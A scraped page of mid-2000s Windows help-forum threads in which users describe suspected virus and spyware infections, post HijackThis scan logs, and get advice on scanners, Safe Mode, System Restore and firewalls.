I was using my computer today and suddenly my mouse started having problems. The clicker (arrow thing I don't know how you call it) would move EXTREMELY SLOW and would sometimes not move at all. When I clicked on thins like to make a window bigger or to close it sometimes it wouldn't perform the action. (ex. I click on FireFox "x" to close it but nothing will happen) Also, EVEN if I don't click on something it will automatically click on it and get STUCK. I checked my mouse (wireless Logitech mouse) and re-installed the software and checked the batteries and all and I STILL have the problem. I scanned w/ ewido which found three viruses. I restarted and nothing. I ran AdWare and Spybot Search and Detroy - nothing. I ran AVG which found two trojans, one it deleted the other one was left intact apparently. The problem persists. I do not know what could be affecting the mouse or even if it's a virus.

Any help would be appreciated.Disable System Restore, re-start in Safe Mode & run the scans again.
Make sure your scanners are uptodate first.Well I did exactly what you said (are the scans supposed to take 2x as long in safe mode? Beacuse they took WAY longer than usual) and nothing came up. The mouse has been working fine so far (10 minutes) but one thing I did notice is that there have been several changes to the REGISTRY ( I have Kerio personal firewall and it shows me the changes) I can't exactly read them because they pop up too fast but something changed on my msn, aim, and some tmeeh thing.

I hope the problem is gone.

140.

Solve : Re: ADW_GAIN.H?

Answer»

It will be a variant.
Google for ADW_GAIN.A or B or C etc.
Then REMOVE it.

141.

Solve : What is "american.exe"is it a trojen??

Answer»

Hello, I'am the new kid on the block,and this is all new to me,I hope i'am the correct forum.
Question? today I downloaded "hijackthis" from download.com,anyway when I tried to
run the program I received a message "can't FIND american.exe FILE" I remember this
was used my americangreeting card web site once. Is this safe to download"american.exe"
inable to run hijackthis.  :-?
Thanks Donamerican.exe is not a Hijackthis file so don't download it.
http://securityresponse.symantec.com/avcenter/venc/data/american.exe.file.threat.html
I would download Hijackthis again. qzqhk2.......... Download it from this LOCATION
http://www.majorgeeks.com/download3155.html
Save it to your DESKTOP ...... then open it and run and save scan ....then you can post it here .

dl65  
Thanks for the info,I'am at work so I can't do anything till tomorrow
morning. Thanks again

Don run some other viruses scans too, perhaps a virus block the program... for a list of good scanners see the q&a forum....

142.

Solve : Security Hole?

Answer»

Does anyone KNOW anything about the .WMF security hole ? I heard it's a hole created by Microsoft so that the government can spy on you for security reasons... Anyone know what the truth is?  :-/

FlameThat is what I have heard also. Even though it is illegal, I have heard some people fill those holes. Supposedly, they put their signal through their, without you even knowing. Pretty cool if you ask me.Flame........   It a conspiracy ...designed to get you ...lol ...... Have you applied the patch yet ?  

dl65  No patches applied. All I have is what Windows Updates give me... I hear you can block the hole, but that's illegal lol

Flame.... LOL ...I just sent you a test app via Email to see if your patched .


dl65  Check your updates ...... I think update KB912919  JAN 6 , 2006 patched it ....

let me know

dl65  Windows Update does not show anything that has not been installed. I probably have it somehow... :-/

Flame Quote

Does anyone know anything about the .WMF security hole ? I heard it's a hole created by Microsoft so that the government can spy on you for security reasons... Anyone know what the truth is?  :-/

Flame

I noted this version at the first time we mentioned it at this forum if you remember. Can we test that  if patch worked or not? I don't think MS updates are so reliable. Quote
Windows Update does not show anything that has not been installed. I probably have it somehow... :-/

Flame


You can always download the Microsoft Baseline Security Analyzer. In addition to common security misconfigurations, it will identify security patches that have not been installed.

http://www.microsoft.com/downloads/Browse.aspx?displaylang=en&productID=38DF6AB1-13D4-409C-966D-CBE61F040027

MBSA is about 2/3 down the page.

Good luck.  8-)

Another one to be added to Urban Legends. Strictly a rumor. If the government WANTS in your computer, they will get in, with or without any HELP from MS.
143.

Solve : IRC bot/Serv-u FTPD hack kit - Huh??

Answer»

I'm told I could have a bug, virus, spy or something scary called an IRC bot/Serv-u FTPD hack kit that
hides itself in windir/system32/drivers/etc  - (etc being the bad part)

I do have this etc file and did use the patch exe file from a friends cd that I'm told it came from. [smiley=embarassed.gif]
So - do I delete it, destroy it with Steganos, relax or set fire to my PC?

I run XP Home and have  AVG, Spybot, SpyDoctor, AdAware, Ewidow, CWS and cCleaner - hope this is enough info  [smiley=smiley.gif]
(Only AVG and SpyDoctor are running permanently)

All help / advice very welcome - thanks in advance.
Springbok

Why don't you download and run HijackThis and post your logfile here for our resident expert, dl65.

http://www.majorgeeks.com/download3155.html

You might ALSO want to try the free online scanner at www.trendmicro.com springbok...... Are your win updates CURRENT ?
Lets see a hijackthis log .........and we can try that first ...........
When you ran Ewido ...did you do it from the safe mode with your system retsore turned off ?


dl65  Do NOT delete your etc directory.Hi all, thanks for the reponse.
First, I have got highjackthis but it's not installed and I'm not sure about how to use it.
I'll will do all that but in the meantime I got a housecall from Trend, it found 7 items it didn't like much and removed all except one - [highlight]TROJ_SE.67431[/highlight]. It did manage to remove a second similar (TROJ_SE.67426).
Next I ran Ewidow - it found only one cookie = Euroclick, & removed.
Next I ran SpyDoctor which found 32 undesirables but only one high risk - VX2-Look2Me (also removed).

Running with restore turned off and in [highlight]SAFE[/highlight] mode.
On my old WIN95 SE I could slip into safe mode anytime I liked, with XP I can't figure out how, even tho' I did it once a few months ago.  [smiley=sad.gif] Also cannot see anyway to turn off Restore!
I'll come back when I've run hijackthis, in the meantime, thanks a lot for your kind interest and advice.
Really glad I found you all!  [smiley=smiley.gif]Sorry dl65, in reply to the question you asked, yes, my Win updates are current - as from this morning in fact.
The update thing is set on auto and seems to be performing fine. Phew!
As for safe mode and restore off, I replied to that in the post above.  [smiley=smiley.gif]
Before anyone suggests a name change - I'm going from Springbok to Dumbo - (maybe)!  [smiley=lolk.gif]

Springbok Quote

Running with restore turned off and in [highlight]SAFE[/highlight] mode.
On my old WIN95 SE I could slip into safe mode anytime I liked, with XP I can't figure out how, even tho' I did it once a few months ago.  [smiley=sad.gif] Also cannot see anyway to turn off Restore!

Safe Mode is F8 when the machine starts (before you see the Windows logo). You can tap the key several times as the machine is starting.

System Restore info is here:

http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2001111912274039?OpenDocument&src=sec_doc_nam

You have learned a great deal this week. Be sure and practice safe computing.  We are glad you are up and running, though.  

Hi again,
Thanks for the info GX1_Man, I spent some time trying to find the system control panel (I'm using the windows 'Classic' layout) but got there in the end.
Also remembered the tapping of F8 for safe mode (thanks), haven't tried either yet but will do so later.
In the meantime I have a HIGHJACK log - hope it helps -

Logfile of HijackThis v1.99.1
Scan saved at 16:57:30, on 11/01/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
c:\APPS\Powercinema\Kernel\TV\CLCapSvc.exe
C:\Program Files\CyberLink\Shared Files\CLML_NTService\CLMLServer.exe
C:\Program Files\CyberLink\Shared Files\CLML_NTService\CLMLService.exe
c:\APPS\HIDSERVICE\HIDSERVICE.exe
C:\Program Files\Spyware Doctor\sdhelp.exe
C:\WINDOWS\system32\SLEE401.exe
C:\WINDOWS\system32\slserv.exe
C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\WINDOWS\system32\wdfmgr.exe
c:\APPS\Powercinema\Kernel\TV\CLSched.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\VTTimer.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Apps\Powercinema\PCMService.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Spyware Doctor\swdoctor.exe
C:\Program Files\Steganos Security Suite 5\spm.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\notepad.exe
D:\Programs\Psuite.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Steganos Security Suite 5\steganos5.exe
C:\Program Files\Steganos Security Suite 5\safe.exe
C:\WINDOWS\system32\ntvdm.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Hijackthis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://format.packardbell.com/cgi-bin/redirect/?country=UK&range=AD&phase=6&key=SEARCH
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start PAGE = http://www.universal-archives.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = file://C:\APPS\IE\offline\uk.htm
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = "C:\Program Files\Outlook Express\msimn.exe"
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Packard Bell
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: IE 4.x-6.x BHO for Internet Download Accelerator - {2A646672-9C3A-4C28-9A7A-1FB0F63F28B6} - C:\PROGRA~1\IDA\idaiehlp.dll
O2 - BHO: PCTools Site Guard - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - C:\PROGRA~1\SPYWAR~1\tools\iesdsg.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: PCTools Browser Monitor - {B56A7D7D-6927-48C8-A975-17DF180C71AC} - C:\PROGRA~1\SPYWAR~1\tools\iesdpb.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [VTTimer] VTTimer.exe
O4 - HKLM\..\Run: [VTTrayp] VTtrayp.exe
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKLM\..\Run: [PCMService] "c:\Apps\Powercinema\PCMService.exe"
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [CnxTrApp] rundll32.exe "C:\Program Files\XIOD\XIOD3200U USB Network\CnxTrApp.dll",AppEntry -REG "Conexant\Conexant USB Network"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [DownloadAccelerator] "C:\Program Files\DAP\DAP.EXE" /STARTUP
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Spyware Doctor] "C:\Program Files\Spyware Doctor\swdoctor.exe" /Q
O4 - HKCU\..\Run: [SSS5SPM] "C:\Program Files\Steganos Security Suite 5\spm.exe" /booting
O4 - Startup: Scheduler.lnk = C:\Program Files\GhostSurf 2005\Scheduler daemon.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: Download ALL with IDA - C:\Program Files\IDA\idaieall.htm
O8 - Extra context menu item: Download with IDA - C:\Program Files\IDA\idaie.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401CYou will have to copy & paste your HJT log in 2 or 3 sections.
Carry on from where it was cut off.Sorry  [smiley=sad.gif]


\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Spyware Doctor - {2D663D1A-8670-49D9-A1A5-4C56B4E14E84} - C:\PROGRA~1\SPYWAR~1\tools\iesdpb.dll
O9 - Extra button: Internet Download Accelerator - {9819CC0E-9669-4D01-9CD7-2C66DA43AC6C} - C:\Program Files\IDA\ida.exe
O9 - Extra 'Tools' menuitem: &Internet Download Accelerator - {9819CC0E-9669-4D01-9CD7-2C66DA43AC6C} - C:\Program Files\IDA\ida.exe
O9 - Extra button: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (no file)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .avi: C:\Program Files\Internet Explorer\PLUGINS\npqtplugin.dll
O12 - Plugin for .mpg: C:\Program Files\Internet Explorer\PLUGINS\npqtplugin3.dll
O12 - Plugin for .wav: C:\Program Files\Internet Explorer\PLUGINS\npqtplugin2.dll
O14 - IERESET.INF: START_PAGE_URL=file://C:\APPS\IE\offline\uk.htm
O23 - Service: Adobe LM Service - Unknown owner - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O23 - Service: CyberLink Background Capture Service (CBCS) (CLCapSvc) - Unknown owner - c:\APPS\Powercinema\Kernel\TV\CLCapSvc.exe
O23 - Service: CyberLink Task Scheduler (CTS) (CLSched) - Unknown owner - c:\APPS\Powercinema\Kernel\TV\CLSched.exe
O23 - Service: CyberLink Media Library Service - Cyberlink - C:\Program Files\CyberLink\Shared Files\CLML_NTService\CLMLServer.exe
O23 - Service: Generic Service for HID Keyboard Input Collections (GenericHidService) - Unknown owner - c:\APPS\HIDSERVICE\HIDSERVICE.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: PC Tools Spyware Doctor (SDhelper) - PC Tools - C:\Program Files\Spyware Doctor\sdhelp.exe
O23 - Service: Steganos Live Encryption Engine (Version 401) [Service] (SLEE_401_SERVICE) - Unknown owner - C:\WINDOWS\system32\SLEE401.exe
O23 - Service: SmartLinkService (SLService) -   - C:\WINDOWS\SYSTEM32\slserv.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: StarWind iSCSI Service (StarWindService) - Rocket Division Software - C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

That's all - sorry I didn't spot that.
Springbokspringbok........
Mark for removal :
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://format.packardbell.com/cgi-bin/redirect/?country=UK&range=AD&phas e=6&key=SEARCH    

Then there are a number of questionable items ........ if you ARE NOT SURE WHAT THEY ARE remove them as well.

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = file://C:\APPS\IE\offline\uk.htm

O4 - HKLM\..\Run: [VTTrayp] VTtrayp.exe

O4 - HKLM\..\Run: [CnxTrApp] rundll32.exe "C:\Program Files\XIOD\XIOD3200U USB Network\CnxTrApp.dll",AppEntry -REG "Conexant\Conexant USB Network"

O4 - Startup: Scheduler.lnk = C:\Program Files\GhostSurf 2005\Scheduler daemon.exe

O9 - Extra button: Internet Download Accelerator - {9819CC0E-9669-4D01-9CD7-2C66DA43AC6C} - C:\Program Files\IDA\ida.exe

O9 - Extra 'Tools' menuitem: &Internet Download Accelerator - {9819CC0E-9669-4D01-9CD7-2C66DA43AC6C} - C:\Program Files\IDA\ida.exe

O14 - IERESET.INF: START_PAGE_URL=file://C:\APPS\IE\offline\uk.htm

Now click on Fix Marked ...then reboot and see how things are .

dl65  Hi dl65,
Late comeback due to our different time zones.
I didn't delete anything as yet, but one or two lines there I do recognise. First is -
 O4 - HKLM\..\Run: [CnxTrApp] rundll32.exe "C:\Program Files\XIOD\XIOD3200U USB Network\CnxTrApp.dll",AppEntry -REG "Conexant\Conexant USB Network"
My broadband works via an EXTERIOR X10D modem. Because my 'out in the sticks' phone line is so bad I lose connection every few minutes. The X10D re-connects. (I think maybe that's what this O4 - HKLM\ line does).
---------
O4 - Startup: Scheduler.lnk = C:\Program Files\GhostSurf 2005\Scheduler daemon.exe  
This Ghostsurf is one my stepson put on via a cd. The prog's not installed so I guess the line can be deleted.
----------
The two O9 - Extra button: Internet Download Accelerator  lines.
Download accelerator is associated with IE - so it fires up whenever I go to a download. If I remove the line will Download Accelerator still work?
----------
There's just one more thing - how or where do I find these lines to remove? I never saw them before I used hijackthis - and that only gave me a text list. Should I use 'search' to get them?
Thanks for your help,  
Springbok

 

Ps dl65,
Yesterday I went to the Microsoft website, and got my PC checked for updates. Seemed I needed quite a few accociated with IE (and others).
I let it download and install the lot - about 15 minutes worth.
Mention this 'cos you asked about updates. Don't know why Auto Update missed them  :-?
SpringbokAhem, I er, found out how to delete from the registry.  [smiley=rolleyes.gif]

And I deleted R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://format.packardbell.com/cgi-bin/redirect/?country=UK&range=AD&phas e=6&key=SEARCH    
 
Just in case any of you guys would like to know, you just click Start, Run, type Regedit and click Ok!
Ok, I'm going, I'm going . . . .  [smiley=lolk.gif]

Still need help, not an expert quite yet.
Springbok

When you run a HJT scan you can delete entries by ticking the checkboxes from within the program.
Is your computer ok?
144.

Solve : To many to list.?

Answer»

Hi ,

I'm going to try and make a long story short.  Only to give as much back ground info as possible.

The end of last winter my daughters PC was plagued by viruses. Since it was a Christmas gift and she didn't have much on it I just re-installed everything.  I just recently had to do the same thing again. (Re-install everything) We went from AOL-*censored* to Verizon DSL in the past few months. FYI - She didn't get the latest DISEASES from DSL. What she was using at the time was Norton Anti Virus, but I can't be certain if and when she actually updated, And Ad-Aware.

Before I put the computer back in her room, and since I know this is virus related and that's why I started this thread under this topic, what do you guys/gals suggest that I do so this never never happens again.

There is an aweful lot I'm leaving out but this is the nuts and bolts of it.

If you need further info please ask eventually her PC will be running off of a ub from my PC on Verizon DSL.

Thank you very much in advance for any help or suggestions.

There shold be a THANK YOU section in this place for evryone to send resonses to.

Peace,
MP.
You didn't say what operating system you are using, but if XP, I would load SP2 before it even gets connected to the net. You can download it and burn to CD from a variety of sites.

After all updates are downloaded I would make sure the auto updating from Windows Update is turned on.

Next I would load, then update Ad Aware and Spybot and AVG Free. They are all free just google for them.

Then I would educate her about internet scum and develop a REGULAR routine for updateing the applications and running in safe mode.

I would give a lesson on regular backups for any "important" data. (I'm sure you do this as well, right?

I would evaluate the need for Instant Messaging programs and explain again that just clcicking on ANYTHING is a sure way to get infected with this crappola.

I would personally check out the system once a week for a few weeks, and walk her through the drills on how to be safe.

Maybe an investment in Ghost or TrueImage to make an image of a clean operating system with all updates loaded, so reinstallation is a 15 minute matter instead of an all DAY affair.

I don't think you can prevent it from ever happening again. (Just look at the help forums on this andother boards!) Safe practice and a plan for disaster seems more reasonable.

Just a few ideas.  

On the other hand, if you have the system to support it, you could spend $50 for a copy of Linspire (one license covers all computers you own) and she will be Linux safe from all viruses, spyware, etc., have a safe IM client, all the software you would want for free, and free updates for all of the computers at home for $19.95 a year total. The only catch is that it does not run Windows programs or games.  A full Microsoft office-compatible suite is included and any other software you might want. It is the most WIndows like Linux and I think everyone would be pleased with it. And no, I do not get a commission.
You can even download a Live CD for free that will boot from and run from your CDROM drive without writing anything to the hard drive. In fact you can even run that version without a hard drive in the machine!!Set her up in a very limited guest account.DUH - Sorry bout that. Yes I'm running XP Home edition.  And will upgrade to SP2.


I will look into spybot and AVG, thanks much, I already use Ad Aware.

I'll set her up for auto updates. I did do this last time but I believe I set it for soemthing like 3am on a friday and her computer was usually powered off at this time.

I could use a little more education concerning the "Running in Safe mode" I remember having to do this once with Gateway tech support with my first PC many years ago. Other then that I don't know to much about it.

You gave me more then ENOUGH to get going and I really want to look into linspire if it's that safe. I use many audio video apps on my own PC and as long as it's compatible I may give it a shot.

I can't thank the both of you enough and you'll probably see me around again soon when I try to network my daughters computer to our DSL hub. lol

This place is a God Send. Happy New Year everyone.

Peace,
MP.

Heres my plan of attack that I'll start as soon as I get home tonight unless I hear different.

Download SP2 (WWW.MICROSOFT.COM)
Then download the next 3 and I don't believe the order should make a difference.
www.spy-bot.com
free.grisoft.com
www.lavasoftuse.com/software/adaware


Thank again.
http://www.microsoft.com/athome/security/spyware/software/default.mspxFed ,

Should I replace one, or more, of the above with Microsoft Antispyware or add that to my list.

Thanks much for the help.No, adaware is not a realtime scanner & neither is Spybot unless you activate it's resident.
AVG is antivirus so it's a different kettle of fish.
Use AVG, Adaware, Spybot & Microsoft Antispyware.
Make sure you have a firewall activated too.I'm proud to say I'm responding from my daughters PC. I installed all of the above. Thanks all three of you, and am delighted with the results. I did notice a considerable difference in the screen refresh time once Spy Bot was installed?

Right now I'm on the net and it's running like a champ. My next hurdle is getting her pc and mine to both run using Verizon DSL.

Thank you very much for the help.

Peace,
MP. Quote

I did notice a considerable difference in the screen refresh time once Spy Bot was installed?  
Tell us more about this, faster, slower, what SPybot options have you used? Quote
My next hurdle is getting her pc and mine to both run using Verizon DSL.

I'm glad all is well with that machine now.


Are you planning on running wired or WIRELESS? We can help get you set up wih that as well.   Do you have equipment yet? If you need help, just star a new thread in the Hardware Forum called "Need help with network setup" or something like that.Fed ,

The screen refresh time was slower once I installed Spy-Bot. Options? I pretty much used auto install for all the software don't know enough to do it manually.

GX1_Man ,

I will be using Linksys Wireless-G equipment. It worked well when I had Comcast cable and we both had much older machines. Unless the install goes 1 2 3 , which never happens for me, you can bet you'll see a thread from me. lol Saves me a helluva lot of time.

Thanks again.

Do you have a small Spybot Resident Icon in the right hand side of your taskbar?
If not, then spybot isn't even running and your slow refresh time is being caused by something else.
Possibly Microsoft Antispyware is doing it as adaware doesn't run all the time & AVG is very easy on system resources.Fed,

Your right there is no icon in the taskbar. There is one for each AVG and MS Antispyware but only a desk top for Spy-Bot. I'm using her PC now and it's not bad at all. Maybe DSL went slower with high usage? Just a guess.Open the Spybot main screen, then set it to Advanced Mode, then open the Tools Section and have a look around.
There is a lot more to Spybot than meets the eye.
Check out the Resident.
145.

Solve : What firewall is better??

Answer»

I'm not LOOKING for the SUPPOSED BEST firewall, but of these two, which is better?  :-?

FlameI picked the NON-Norton one. Non-Norton for me as well. Do you have a router or are you on dialup?IT'S RIGGED!  

2 Non-Norton votes and look at the count!
Is the Florida Flame punching holes or making pimples?The poll is not rigged lol  I voted for Norton, becuase I wanted to see that stats lol  I didn't rig it in any way. Is this a forum error? Also, I am not using a Router or Dial-Up. I'm just using a DSL Modem.  

FlameIt really depends what you're looking for.

If you'd like to have a machine that runs so slow that you require 2 gigs of ram just to open notepad while the firewall is running, then go with Norton.

If you'd like to have a computer that may displays errors and play up constantly because of the conflicts, FEEL free to go ahead with ZoneAlarm (I know some people have been able to use it problem-free, but everytime I've installed it I've had issues).

If you like getting spyware and other malicious infections, go with the one built into Service Pack 2.

If you'd like a good, low-resource firewall that provides good protection, look for a link to Sygate before it disappears forever. Failing that, Kerio would be a good option.

with regardsThe latest Sygate firewall had some bugs, people were advised to use Version 5.5 Build 2710.
http://207.33.111.31/spf/Zone Alarm. Try the 15 day free trial for Professional.http://www.snapfiles.com/freeware/security/fwfirewall.html

Are any of these out dated? I wanna try them out all of them says freeware but some i do not reconise and other I do. What do you guys think?the vote isn't really correct. Zone alarm STAYS free, norton is just free for 30 days or less

146.

Solve : http://www.ix.se/?

Answer»

here's the scoop... i have windows xp pro, and i run spybot and symantec ANTIVIRUS. the problem is and it only happens the first time i log on to the web and open internet explorer. explorer OPENS and a SECOND pop up... http://www.ix.se/... i've run spybot and antivirus and neither has found this spyware or adware, and both programs are UPDATED and help would be great!Download and run AdAware after updating it

http://www.download.com/Ad-Aware-SE-Personal-Edition/3000-8022_4-10045910.html?part=dl-ad-aware&subj=dl&tag=top5

Download Ewido and run it.

http://www.ewido.net/en/

If this doesn't remove it, download and run Hijack THis and post the log file here for expert analysis.

http://www.majorgeeks.com/download3155.html


You are definitely infected with something!!!  All scans are best run in safe mode, by the way.Your the man... thanks a lot, worked like a charm!Thanks for posting back. I'm glad everything is FIXED!   Quote

Thanks for posting back. please let us know what worked. I'm glad everything is fixed!  
147.

Solve : Norton Virus?

Answer»

Hi I installed Norton virus and now I cannot use yahoo messenger or aol messenger?  I can use msn messenger.  How can I fix this??Uninstall Norton? Seriously you have to give a few details about your system - specs, operating system, any spyware/adware solutions being used. what happened prior to this, specific error MESSAGES, etc.

Kreskin is out today.What version of Norton are you using? Are you using the Firewall that comes with the utility?

with regardslovehopepeace..... Open up Norton Anti virus ......and click on options ....then in the Internet section ...click instant messenger ....... then make sure you put a tick in the box in front of AOL Instant messenger and Yahoo Instant messenger ......I'll bet MSN/Windows Instant messenger is already ticked ......that should do it .......


dl65  Just wanted to say thank you for your help.  I am sorry that I didn't give some of you enoguh INFORMATION but
                                 Quote

lovehopepeace..... Open up Norton Anti virus ......and click on options ....then in the Internet section ...click instant messenger ....... then make sure you put a tick in the box in front of AOL Instant messenger and Yahoo Instant messenger ......I'll bet MSN/Windows Instant messenger is already ticked ......that should do it .......

This is what I did and it worked.  Thank you so much for your helpHi all ,  

I'm new around here. Hello to you all. Happy New Year and Best Wishes for 2006 !

 [smiley=shocked.gif] You still  use Norton Antivirus ?  Yikes , I don't want to ever INSTALL that one again. Neither do I recommend people to use Norton or Mcafee.

Norton and Mcafee suck big time.

I use Panda Platinum Internet Security 2005 and it works well here. I use Panda for a few years now. Never had any virus since then. Used Panda Antivirus Titanium 2004 before I switched to Panda Platinum Internet Security.

At first I had some problems with it , but now I know what was causing that , the internal built-in firewall.

It all works well now. Panda also has TruPrevent Technologies aboard , which looks for suspicious behavior of software and also checks the processes.

PandaSoftware rules !!!!!



Norton is fine usually, in our experience.

Anyone having TROUBLE with their existing virus program might like to TRY the free AVG from Grisoft. Works well for us too.

http://www.grisoft.com/doc/1

The Simple Security Team
http://www.lulu.com/simplesecurity
148.

Solve : please help decipher hijack this log?

Answer»

The symptoms are slow internet and many pop-ups. I thought I had it cleaned out several times but keeps comming back. If one of you experts could let me know what needs to go I WOULD be grateful. Here is the log. I have windows xp pro and a hardware firewall. No antivirus software running. Thanks for your time.

 LOGFILE of HijackThis v1.99.1
Scan saved at 8:19:52 PM, on 1/4/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Documents and Settings\Default\Desktop\HijackThis.exe

O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {6001CDF7-6F45-471b-A203-0225615E35A7} - C:\WINDOWS\DH.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: (no name) - {7BC87158-55FB-3A77-DF75-3764B3B38F10} - C:\WINDOWS\ufcygdzo.dll
O2 - BHO: (no name) - {8431AAA5-6F48-40CC-69B2-16F3BD4066C0} - C:\WINDOWS\System32\kaneomy.dll
O2 - BHO: (no name) - {C5AF2622-8C75-4dfb-9693-23AB7686A456} - C:\WINDOWS\DH.dll
O2 - BHO: SuperSecretServer.Shhh - {FB0FDDBA-27C2-441E-A4A6-7EC0E9F60E63} - C:\WINDOWS\System32\{FB0FDDBA-27C2-441E-A4A6-7EC0E9F60E63}.dll
